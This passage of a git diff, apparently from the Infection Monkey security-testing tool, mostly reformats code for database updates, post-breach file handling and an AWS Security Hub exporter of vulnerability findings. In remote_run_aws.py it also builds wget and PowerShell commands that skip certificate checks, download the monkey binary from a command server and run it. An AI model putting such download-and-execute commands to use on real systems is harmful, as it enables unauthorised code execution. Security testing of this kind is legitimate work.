monkey_id}, - {"$set": {"modifytime": datetime.now()}}, - upsert=False) + mongo.db.monkey.update( + {"_id": monkey_id}, {"$set": {"modifytime": datetime.now()}}, upsert=False + ) @staticmethod def set_monkey_dead(monkey, is_dead): - props_to_set = {'dead': is_dead} + props_to_set = {"dead": is_dead} # Cancel the force kill once monkey died if is_dead: - props_to_set['config.alive'] = True + props_to_set["config.alive"] = True - mongo.db.monkey.update({"guid": monkey['guid']}, - {'$set': props_to_set}, - upsert=False) + mongo.db.monkey.update({"guid": monkey["guid"]}, {"$set": props_to_set}, upsert=False) @staticmethod def add_communication_info(monkey, info): - mongo.db.monkey.update({"guid": monkey["guid"]}, - {"$set": {'command_control_channel': info}}, - upsert=False) + mongo.db.monkey.update( + {"guid": monkey["guid"]}, {"$set": {"command_control_channel": info}}, upsert=False + ) @staticmethod def get_monkey_island_monkey(): @@ -338,12 +338,11 @@ class NodeService: @staticmethod def get_monkey_island_pseudo_net_node(): - return \ - { - "id": NodeService.get_monkey_island_pseudo_id(), - "label": "MonkeyIsland", - "group": "island", - } + return { + "id": NodeService.get_monkey_island_pseudo_id(), + "label": "MonkeyIsland", + "group": "island", + } @staticmethod def get_monkey_island_node(): @@ -354,22 +353,23 @@ class NodeService: @staticmethod def set_node_exploited(node_id): - mongo.db.node.update( - {"_id": node_id}, - {"$set": {"exploited": True}} - ) + mongo.db.node.update({"_id": node_id}, {"$set": {"exploited": True}}) @staticmethod def update_dead_monkeys(): # Update dead monkeys only if no living monkey transmitted keepalive in the last 10 minutes if mongo.db.monkey.find_one( - {'dead': {'$ne': True}, 'keepalive': {'$gte': datetime.now() - timedelta(minutes=10)}}): + {"dead": {"$ne": True}, "keepalive": {"$gte": datetime.now() - timedelta(minutes=10)}} + ): return # config.alive is changed to true to cancel the force kill of dead monkeys mongo.db.monkey.update( - {'keepalive': {'$lte': datetime.now() - timedelta(minutes=10)}, 'dead': {'$ne': True}}, - {'$set': {'dead': True, 'config.alive': True, 'modifytime': datetime.now()}}, upsert=False, multi=True) + {"keepalive": {"$lte": datetime.now() - timedelta(minutes=10)}, "dead": {"$ne": True}}, + {"$set": {"dead": True, "config.alive": True, "modifytime": datetime.now()}}, + upsert=False, + multi=True, + ) @staticmethod def is_any_monkey_alive(): @@ -386,17 +386,11 @@ class NodeService: @staticmethod def add_credentials_to_monkey(monkey_id, creds): - mongo.db.monkey.update( - {'_id': monkey_id}, - {'$push': {'creds': creds}} - ) + mongo.db.monkey.update({"_id": monkey_id}, {"$push": {"creds": creds}}) @staticmethod def add_credentials_to_node(node_id, creds): - mongo.db.node.update( - {'_id': node_id}, - {'$push': {'creds': creds}} - ) + mongo.db.node.update({"_id": node_id}, {"$push": {"creds": creds}}) @staticmethod def get_node_or_monkey_by_ip(ip_address): @@ -414,16 +408,18 @@ class NodeService: @staticmethod def get_node_hostname(node): - return node['hostname'] if 'hostname' in node else node['os']['version'] + return node["hostname"] if "hostname" in node else node["os"]["version"] @staticmethod def get_hostname_by_id(node_id): - return NodeService.get_node_hostname(mongo.db.monkey.find_one({'_id': node_id}, {'hostname': 1})) + return NodeService.get_node_hostname( + mongo.db.monkey.find_one({"_id": node_id}, {"hostname": 1}) + ) @staticmethod def get_label_for_endpoint(endpoint_id): if endpoint_id == ObjectId("000000000000000000000000"): - return 'MonkeyIsland' + return "MonkeyIsland" if Monkey.is_monkey(endpoint_id): return Monkey.get_label_by_id(endpoint_id) else: diff --git a/monkey/monkey_island/cc/services/post_breach_files.py b/monkey/monkey_island/cc/services/post_breach_files.py index 44f1b91b2..4215227ea 100644 --- a/monkey/monkey_island/cc/services/post_breach_files.py +++ b/monkey/monkey_island/cc/services/post_breach_files.py @@ -11,18 +11,22 @@ from monkey_island.cc.server_utils.consts import MONKEY_ISLAND_ABS_PATH logger = logging.getLogger(__name__) # Where to find file names in config -PBA_WINDOWS_FILENAME_PATH = ['monkey', 'post_breach', 'PBA_windows_filename'] -PBA_LINUX_FILENAME_PATH = ['monkey', 'post_breach', 'PBA_linux_filename'] -UPLOADS_DIR_NAME = 'userUploads' +PBA_WINDOWS_FILENAME_PATH = ["monkey", "post_breach", "PBA_windows_filename"] +PBA_LINUX_FILENAME_PATH = ["monkey", "post_breach", "PBA_linux_filename"] +UPLOADS_DIR_NAME = "userUploads" -ABS_UPLOAD_PATH = Path(MONKEY_ISLAND_ABS_PATH, 'cc', UPLOADS_DIR_NAME) +ABS_UPLOAD_PATH = Path(MONKEY_ISLAND_ABS_PATH, "cc", UPLOADS_DIR_NAME) def remove_PBA_files(): if monkey_island.cc.services.config.ConfigService.get_config(): - windows_filename = monkey_island.cc.services.config.ConfigService.get_config_value(PBA_WINDOWS_FILENAME_PATH) - linux_filename = monkey_island.cc.services.config.ConfigService.get_config_value(PBA_LINUX_FILENAME_PATH) + windows_filename = monkey_island.cc.services.config.ConfigService.get_config_value( + PBA_WINDOWS_FILENAME_PATH + ) + linux_filename = monkey_island.cc.services.config.ConfigService.get_config_value( + PBA_LINUX_FILENAME_PATH + ) if linux_filename: remove_file(linux_filename) if windows_filename: @@ -44,7 +48,11 @@ def set_config_PBA_files(config_json): :param config_json: config_json that will be modified """ if monkey_island.cc.services.config.ConfigService.get_config(): - linux_filename = monkey_island.cc.services.config.ConfigService.get_config_value(PBA_LINUX_FILENAME_PATH) - windows_filename = monkey_island.cc.services.config.ConfigService.get_config_value(PBA_WINDOWS_FILENAME_PATH) - config_json['monkey']['post_breach']['PBA_linux_filename'] = linux_filename - config_json['monkey']['post_breach']['PBA_windows_filename'] = windows_filename + linux_filename = monkey_island.cc.services.config.ConfigService.get_config_value( + PBA_LINUX_FILENAME_PATH + ) + windows_filename = monkey_island.cc.services.config.ConfigService.get_config_value( + PBA_WINDOWS_FILENAME_PATH + ) + config_json["monkey"]["post_breach"]["PBA_linux_filename"] = linux_filename + config_json["monkey"]["post_breach"]["PBA_windows_filename"] = windows_filename diff --git a/monkey/monkey_island/cc/services/remote_run_aws.py b/monkey/monkey_island/cc/services/remote_run_aws.py index dfaa0e327..e640110e0 100644 --- a/monkey/monkey_island/cc/services/remote_run_aws.py +++ b/monkey/monkey_island/cc/services/remote_run_aws.py @@ -48,9 +48,13 @@ class RemoteRunAwsService: return CmdRunner.run_multiple_commands( instances, lambda instance: RemoteRunAwsService.run_aws_monkey_cmd_async( - instance['instance_id'], RemoteRunAwsService._is_linux(instance['os']), island_ip, - instances_bitness[instance['instance_id']]), - lambda _, result: result.is_success) + instance["instance_id"], + RemoteRunAwsService._is_linux(instance["os"]), + island_ip, + instances_bitness[instance["instance_id"]], + ), + lambda _, result: result.is_success, + ) @staticmethod def is_running_on_aws(): @@ -73,18 +77,23 @@ class RemoteRunAwsService: return CmdRunner.run_multiple_commands( instances, lambda instance: RemoteRunAwsService.run_aws_bitness_cmd_async( - instance['instance_id'], RemoteRunAwsService._is_linux(instance['os'])), + instance["instance_id"], RemoteRunAwsService._is_linux(instance["os"]) + ), lambda instance, result: RemoteRunAwsService._get_bitness_by_result( - RemoteRunAwsService._is_linux(instance['os']), result)) + RemoteRunAwsService._is_linux(instance["os"]), result + ), + ) @staticmethod def _get_bitness_by_result(is_linux, result): if not result.is_success: return None elif is_linux: - return result.stdout.find('i686') == -1 # i686 means 32bit + return result.stdout.find("i686") == -1 # i686 means 32bit else: - return result.stdout.lower().find('programfiles(x86)') != -1 # if not found it means 32bit + return ( + result.stdout.lower().find("programfiles(x86)") != -1 + ) # if not found it means 32bit @staticmethod def run_aws_bitness_cmd_async(instance_id, is_linux): @@ -94,7 +103,7 @@ class RemoteRunAwsService: :param is_linux: Whether target is linux :return: Cmd """ - cmd_text = 'uname -m' if is_linux else 'Get-ChildItem Env:' + cmd_text = "uname -m" if is_linux else "Get-ChildItem Env:" return RemoteRunAwsService.run_aws_cmd_async(instance_id, is_linux, cmd_text) @staticmethod @@ -117,24 +126,42 @@ class RemoteRunAwsService: @staticmethod def _is_linux(os): - return 'linux' == os + return "linux" == os @staticmethod def _get_run_monkey_cmd_linux_line(bit_text, island_ip): - return r'wget --no-check-certificate https://' + island_ip + r':5000/api/monkey/download/monkey-linux-' + \ - bit_text + r'; chmod +x monkey-linux-' + bit_text + r'; ./monkey-linux-' + bit_text + r' m0nk3y -s ' + \ - island_ip + r':5000' + return ( + r"wget --no-check-certificate https://" + + island_ip + + r":5000/api/monkey/download/monkey-linux-" + + bit_text + + r"; chmod +x monkey-linux-" + + bit_text + + r"; ./monkey-linux-" + + bit_text + + r" m0nk3y -s " + + island_ip + + r":5000" + ) @staticmethod def _get_run_monkey_cmd_windows_line(bit_text, island_ip): - return r"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {" \ - r"$true}; (New-Object System.Net.WebClient).DownloadFile('https://" + island_ip + \ - r":5000/api/monkey/download/monkey-windows-" + bit_text + r".exe','.\\monkey.exe'); " \ - r";Start-Process -FilePath '.\\monkey.exe' " \ - r"-ArgumentList 'm0nk3y -s " + island_ip + r":5000'; " + return ( + r"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {" + r"$true}; (New-Object System.Net.WebClient).DownloadFile('https://" + + island_ip + + r":5000/api/monkey/download/monkey-windows-" + + bit_text + + r".exe','.\\monkey.exe'); " + r";Start-Process -FilePath '.\\monkey.exe' " + r"-ArgumentList 'm0nk3y -s " + island_ip + r":5000'; " + ) @staticmethod def _get_run_monkey_cmd_line(is_linux, is_64bit, island_ip): - bit_text = '64' if is_64bit else '32' - return RemoteRunAwsService._get_run_monkey_cmd_linux_line(bit_text, island_ip) if is_linux \ + bit_text = "64" if is_64bit else "32" + return ( + RemoteRunAwsService._get_run_monkey_cmd_linux_line(bit_text, island_ip) + if is_linux else RemoteRunAwsService._get_run_monkey_cmd_windows_line(bit_text, island_ip) + ) diff --git a/monkey/monkey_island/cc/services/reporting/aws_exporter.py b/monkey/monkey_island/cc/services/reporting/aws_exporter.py index 1347775d0..1505b63aa 100644 --- a/monkey/monkey_island/cc/services/reporting/aws_exporter.py +++ b/monkey/monkey_island/cc/services/reporting/aws_exporter.py @@ -8,7 +8,7 @@ from botocore.exceptions import UnknownServiceError from common.cloud.aws.aws_instance import AwsInstance from monkey_island.cc.services.reporting.exporter import Exporter -__authors__ = ['maor.rayzin', 'shay.nehmad'] +__authors__ = ["maor.rayzin", "shay.nehmad"] logger = logging.getLogger(__name__) @@ -20,9 +20,9 @@ class AWSExporter(Exporter): def handle_report(report_json): findings_list = [] - issues_list = report_json['recommendations']['issues'] + issues_list = report_json["recommendations"]["issues"] if not issues_list: - logger.info('No issues were found by the monkey, no need to send anything') + logger.info("No issues were found by the monkey, no need to send anything") return True # Not suppressing error here on purpose. @@ -30,11 +30,11 @@ class AWSExporter(Exporter): for machine in issues_list: for issue in issues_list[machine]: - if issue.get('aws_instance_id', None): + if issue.get("aws_instance_id", None): findings_list.append(AWSExporter._prepare_finding(issue, current_aws_region)) if not AWSExporter._send_findings(findings_list, current_aws_region): - logger.error('Exporting findings to aws failed') + logger.error("Exporting findings to aws failed") return False return True @@ -48,30 +48,32 @@ class AWSExporter(Exporter): @staticmethod def _prepare_finding(issue, region): findings_dict = { - 'island_cross_segment': AWSExporter._handle_island_cross_segment_issue, - 'ssh': AWSExporter._handle_ssh_issue, - 'shellshock': AWSExporter._handle_shellshock_issue, - 'tunnel': AWSExporter._handle_tunnel_issue, - 'elastic': AWSExporter._handle_elastic_issue, - 'smb_password': AWSExporter._handle_smb_password_issue, - 'smb_pth': AWSExporter._handle_smb_pth_issue, - 'sambacry': AWSExporter._handle_sambacry_issue, - 'shared_passwords': AWSExporter._handle_shared_passwords_issue, - 'wmi_password': AWSExporter._handle_wmi_password_issue, - 'wmi_pth': AWSExporter._handle_wmi_pth_issue, - 'ssh_key': AWSExporter._handle_ssh_key_issue, - 'shared_passwords_domain': AWSExporter._handle_shared_passwords_domain_issue, - 'shared_admins_domain': AWSExporter._handle_shared_admins_domain_issue, - 'strong_users_on_crit': AWSExporter._handle_strong_users_on_crit_issue, - 'struts2': AWSExporter._handle_struts2_issue, - 'weblogic': AWSExporter._handle_weblogic_issue, - 'hadoop': AWSExporter._handle_hadoop_issue, + "island_cross_segment": AWSExporter._handle_island_cross_segment_issue, + "ssh": AWSExporter._handle_ssh_issue, + "shellshock": AWSExporter._handle_shellshock_issue, + "tunnel": AWSExporter._handle_tunnel_issue, + "elastic": AWSExporter._handle_elastic_issue, + "smb_password": AWSExporter._handle_smb_password_issue, + "smb_pth": AWSExporter._handle_smb_pth_issue, + "sambacry": AWSExporter._handle_sambacry_issue, + "shared_passwords": AWSExporter._handle_shared_passwords_issue, + "wmi_password": AWSExporter._handle_wmi_password_issue, + "wmi_pth": AWSExporter._handle_wmi_pth_issue, + "ssh_key": AWSExporter._handle_ssh_key_issue, + "shared_passwords_domain": AWSExporter._handle_shared_passwords_domain_issue, + "shared_admins_domain": AWSExporter._handle_shared_admins_domain_issue, + "strong_users_on_crit": AWSExporter._handle_strong_users_on_crit_issue, + "struts2": AWSExporter._handle_struts2_issue, + "weblogic": AWSExporter._handle_weblogic_issue, + "hadoop": AWSExporter._handle_hadoop_issue, # azure and conficker are not relevant issues for an AWS env } configured_product_arn = INFECTION_MONKEY_ARN - product_arn = 'arn:aws:securityhub:{region}:{arn}'.format(region=region, arn=configured_product_arn) - instance_arn = 'arn:aws:ec2:' + str(region) + ':instance:{instance_id}' + product_arn = "arn:aws:securityhub:{region}:{arn}".format( + region=region, arn=configured_product_arn + ) + instance_arn = "arn:aws:ec2:" + str(region) + ":instance:{instance_id}" # Not suppressing error here on purpose. account_id = AwsInstance().get_account_id() logger.debug("aws account id acquired: {}".format(account_id)) @@ -80,22 +82,22 @@ class AWSExporter(Exporter): "SchemaVersion": "2018-10-08", "Id": uuid.uuid4().hex, "ProductArn": product_arn, - "GeneratorId": issue['type'], + "GeneratorId": issue["type"], "AwsAccountId": account_id, "RecordState": "ACTIVE", - "Types": [ - "Software and Configuration Checks/Vulnerabilities/CVE" - ], - "CreatedAt": datetime.now().isoformat() + 'Z', - "UpdatedAt": datetime.now().isoformat() + 'Z', + "Types": ["Software and Configuration Checks/Vulnerabilities/CVE"], + "CreatedAt": datetime.now().isoformat() + "Z", + "UpdatedAt": datetime.now().isoformat() + "Z", } - return AWSExporter.merge_two_dicts(finding, findings_dict[issue['type']](issue, instance_arn)) + return AWSExporter.merge_two_dicts( + finding, findings_dict[issue["type"]](issue, instance_arn) + ) @staticmethod def _send_findings(findings_list, region): try: logger.debug("Trying to acquire securityhub boto3 client in " + region) - security_hub_client = boto3.client('securityhub', region_name=region) + security_hub_client = boto3.client("securityhub", region_name=region) logger.debug("Client acquired: {0}".format(repr(security_hub_client))) # Assumes the machine has the correct IAM role to do this, @see @@ -103,42 +105,39 @@ class AWSExporter(Exporter): import_response = security_hub_client.batch_import_findings(Findings=findings_list) logger.debug("Import findings response: {0}".format(repr(import_response))) - if import_response['ResponseMetadata']['HTTPStatusCode'] == 200: + if import_response["ResponseMetadata"]["HTTPStatusCode"] == 200: return True else: return False except UnknownServiceError as e: - logger.warning('AWS exporter called but AWS-CLI security hub service is not installed. Error: {}'.format(e)) + logger.warning( + "AWS exporter called but AWS-CLI security hub service is not installed. Error: {}".format( + e + ) + ) return False except Exception as e: - logger.exception('AWS security hub findings failed to send. Error: {}'.format(e)) + logger.exception("AWS security hub findings failed to send. Error: {}".format(e)) return False @staticmethod def _get_finding_resource(instance_id, instance_arn): if instance_id: - return [{ - "Type": "AwsEc2Instance", - "Id": instance_arn.format(instance_id=instance_id) - }] + return [{"Type": "AwsEc2Instance", "Id": instance_arn.format(instance_id=instance_id)}] else: - return [{'Type': 'Other', 'Id': 'None'}] + return [{"Type": "Other", "Id": "None"}] @staticmethod - def _build_generic_finding(severity, title, description, recommendation, instance_arn, instance_id=None): + def _build_generic_finding( + severity, title, description, recommendation, instance_arn, instance_id=None + ): finding = { - "Severity": { - "Product": severity, - "Normalized": 100 - }, - 'Resources': AWSExporter._get_finding_resource(instance_id, instance_arn), + "Severity": {"Product": severity, "Normalized": 100}, + "Resources": AWSExporter._get_finding_resource(instance_id, instance_arn), "Title": title, "Description": description, - "Remediation": { - "Recommendation": { - "Text": recommendation - } - }} + "Remediation": {"Recommendation": {"Text": recommendation}}, + } return finding @@ -150,9 +149,9 @@ class AWSExporter(Exporter): title="Weak segmentation - Machines were able to communicate over unused ports.", description="Use micro-segmentation policies to disable communication other than the required.", recommendation="Machines are not locked down at port level. " - "Network tunnel was set up from {0} to {1}".format(issue['machine'], issue['dest']), + "Network tunnel was set up from {0} to {1}".format(issue["machine"], issue["dest"]), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -162,13 +161,13 @@ class AWSExporter(Exporter): severity=10, title="Samba servers are vulnerable to 'SambaCry'", description="Change {0} password to a complex one-use password that is not shared with other computers on the " - "network. Update your Samba server to 4.4.14 and up, " - "4.5.10 and up, or 4.6.4 and up.".format(issue['username']), + "network. Update your Samba server to 4.4.14 and up, " + "4.5.10 and up, or 4.6.4 and up.".format(issue["username"]), recommendation="The machine {0} ({1}) is vulnerable to a SambaCry attack. The Monkey authenticated over the SMB " - "protocol with user {2} and its password, and used the SambaCry " - "vulnerability.".format(issue['machine'], issue['ip_address'], issue['username']), + "protocol with user {2} and its password, and used the SambaCry " + "vulnerability.".format(issue["machine"], issue["ip_address"], issue["username"]), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -178,11 +177,13 @@ class AWSExporter(Exporter): severity=5, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " - "network.".format(issue['username']), + "network.".format(issue["username"]), recommendation="The machine {0}({1}) is vulnerable to a SMB attack. The Monkey used a pass-the-hash attack over " - "SMB protocol with user {2}.".format(issue['machine'], issue['ip_address'], issue['username']), + "SMB protocol with user {2}.".format( + issue["machine"], issue["ip_address"], issue["username"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -192,12 +193,12 @@ class AWSExporter(Exporter): severity=1, title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.", description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " - "network.".format(issue['username']), + "network.".format(issue["username"]), recommendation="The machine {0} ({1}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH" - " protocol with user {2} and its " - "password.".format(issue['machine'], issue['ip_address'], issue['username']), + " protocol with user {2} and its " + "password.".format(issue["machine"], issue["ip_address"], issue["username"]), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -206,14 +207,15 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.", - description="Protect {ssh_key} private key with a pass phrase.".format(ssh_key=issue['ssh_key']), + description="Protect {ssh_key} private key with a pass phrase.".format( + ssh_key=issue["ssh_key"] + ), recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated " - "over the SSH protocol with private key {ssh_key}.".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - ssh_key=issue['ssh_key']), + "over the SSH protocol with private key {ssh_key}.".format( + machine=issue["machine"], ip_address=issue["ip_address"], ssh_key=issue["ssh_key"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -224,11 +226,11 @@ class AWSExporter(Exporter): title="Elastic Search servers are vulnerable to CVE-2015-1427", description="Update your Elastic Search server to version 1.4.3 and up.", recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made " - "possible because the Elastic Search server was not patched against CVE-2015-1427.".format( - issue['machine'], - issue['ip_address']), + "possible because the Elastic Search server was not patched against CVE-2015-1427.".format( + issue["machine"], issue["ip_address"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -238,14 +240,14 @@ class AWSExporter(Exporter): severity=1, title="Weak segmentation - Machines from different segments are able to communicate.", description="Segment your network and make sure there is no communication between machines from different " - "segments.", + "segments.", recommendation="The network can probably be segmented. A monkey instance on \ {0} in the networks {1} \ - could directly access the Monkey Island server in the networks {2}.".format(issue['machine'], - issue['networks'], - issue['server_networks']), + could directly access the Monkey Island server in the networks {2}.".format( + issue["machine"], issue["networks"], issue["server_networks"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -255,9 +257,11 @@ class AWSExporter(Exporter): severity=1, title="Multiple users have the same password", description="Some users are sharing passwords, this should be fixed by changing passwords.", - recommendation="These users are sharing access password: {0}.".format(issue['shared_with']), + recommendation="These users are sharing access password: {0}.".format( + issue["shared_with"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -268,11 +272,12 @@ class AWSExporter(Exporter): title="Machines are vulnerable to 'Shellshock'", description="Update your Bash to a ShellShock-patched version.", recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. " - "The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a " - "shell injection attack on the paths: {3}.".format( - issue['machine'], issue['ip_address'], issue['port'], issue['paths']), + "The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a " + "shell injection attack on the paths: {3}.".format( + issue["machine"], issue["ip_address"], issue["port"], issue["paths"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -282,14 +287,13 @@ class AWSExporter(Exporter): severity=1, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " - "network.".format(issue['username']), + "network.".format(issue["username"]), recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB " - "protocol with user {2} and its password.".format( - issue['machine'], - issue['ip_address'], - issue['username']), + "protocol with user {2} and its password.".format( + issue["machine"], issue["ip_address"], issue["username"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -299,14 +303,13 @@ class AWSExporter(Exporter): severity=1, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " - "network.", + "network.", recommendation="The machine {machine} ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over " - "the WMI protocol with user {username} and its password.".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - username=issue['username']), + "the WMI protocol with user {username} and its password.".format( + machine=issue["machine"], ip_address=issue["ip_address"], username=issue["username"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -316,14 +319,13 @@ class AWSExporter(Exporter): severity=1, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " - "network.".format(issue['username']), + "network.".format(issue["username"]), recommendation="The machine {machine} ({ip_address}) is vulnerable to a WMI attack. The Monkey used a " - "pass-the-hash attack over WMI protocol with user {username}".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - username=issue['username']), + "pass-the-hash attack over WMI protocol with user {username}".format( + machine=issue["machine"], ip_address=issue["ip_address"], username=issue["username"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -334,9 +336,10 @@ class AWSExporter(Exporter): title="Multiple users have the same password.", description="Some domain users are sharing passwords, this should be fixed by changing passwords.", recommendation="These users are sharing access password: {shared_with}.".format( - shared_with=issue['shared_with']), + shared_with=issue["shared_with"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -345,12 +348,14 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Shared local administrator account - Different machines have the same account as a local administrator.", - description="Make sure the right administrator accounts are managing the right machines, and that there isn\'t " - "an unintentional local admin sharing.", + description="Make sure the right administrator accounts are managing the right machines, and that there isn't " + "an unintentional local admin sharing.", recommendation="Here is a list of machines which the account {username} is defined as an administrator: " - "{shared_machines}".format(username=issue['username'], shared_machines=issue['shared_machines']), + "{shared_machines}".format( + username=issue["username"], shared_machines=issue["shared_machines"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -361,10 +366,11 @@ class AWSExporter(Exporter): title="Mimikatz found login credentials of a user who has admin access to a server defined as critical.", description="This critical machine is open to attacks via strong users with access to it.", recommendation="The services: {services} have been found on the machine thus classifying it as a critical " - "machine. These users has access to it:{threatening_users}.".format( - services=issue['services'], threatening_users=issue['threatening_users']), + "machine. These users has access to it:{threatening_users}.".format( + services=issue["services"], threatening_users=issue["threatening_users"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -375,10 +381,12 @@ class AWSExporter(Exporter): title="Struts2 servers are vulnerable to remote code execution.", description="Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.", recommendation="Struts2 server at {machine} ({ip_address}) is vulnerable to remote code execution attack." - "The attack was made possible because the server is using an old version of Jakarta based file " - "upload Multipart parser.".format(machine=issue['machine'], ip_address=issue['ip_address']), + "The attack was made possible because the server is using an old version of Jakarta based file " + "upload Multipart parser.".format( + machine=issue["machine"], ip_address=issue["ip_address"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -388,12 +396,14 @@ class AWSExporter(Exporter): severity=10, title="Oracle WebLogic servers are vulnerable to remote code execution.", description="Install Oracle critical patch updates. Or update to the latest version. " - "Vulnerable versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.", + "Vulnerable versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.", recommendation="Oracle WebLogic server at {machine} ({ip_address}) is vulnerable to remote code execution attack." - "The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware " - "(subcomponent: WLS Security).".format(machine=issue['machine'], ip_address=issue['ip_address']), + "The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware " + "(subcomponent: WLS Security).".format( + machine=issue["machine"], ip_address=issue["ip_address"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -404,7 +414,7 @@ class AWSExporter(Exporter): title="Hadoop/Yarn servers are vulnerable to remote code execution.", description="Run Hadoop in secure mode, add Kerberos authentication.", recommendation="The Hadoop server at {machine} ({ip_address}) is vulnerable to remote code execution attack." - "The attack was made possible due to default Hadoop/Yarn configuration being insecure.", + "The attack was made possible due to default Hadoop/Yarn configuration being insecure.", instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) diff --git a/monkey/monkey_island/cc/services/reporting/exporter_init.py b/monkey/monkey_island/cc/services/reporting/exporter_init.py index 391b23cf1..c19f3d5e3 100644 --- a/monkey/monkey_island/cc/services/reporting/exporter_init.py +++ b/monkey/monkey_island/cc/services/reporting/exporter_init.py @@ -13,7 +13,10 @@ def populate_exporter_list(): if len(manager.get_exporters_list()) != 0: logger.debug( - "Populated exporters list with the following exporters: {0}".format(str(manager.get_exporters_list()))) + "Populated exporters list with the following exporters: {0}".format( + str(manager.get_exporters_list()) + ) + ) def try_add_aws_exporter_to_manager(manager): diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py index 65964b5de..f519100ed 100644 --- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py +++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py @@ -2,13 +2,18 @@ from dataclasses import dataclass from enum import Enum from typing import Type, Dict -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.cred_exploit import \ - CredExploitProcessor -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import ExploitProcessor -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.shellshock_exploit import \ - ShellShockExploitProcessor -from 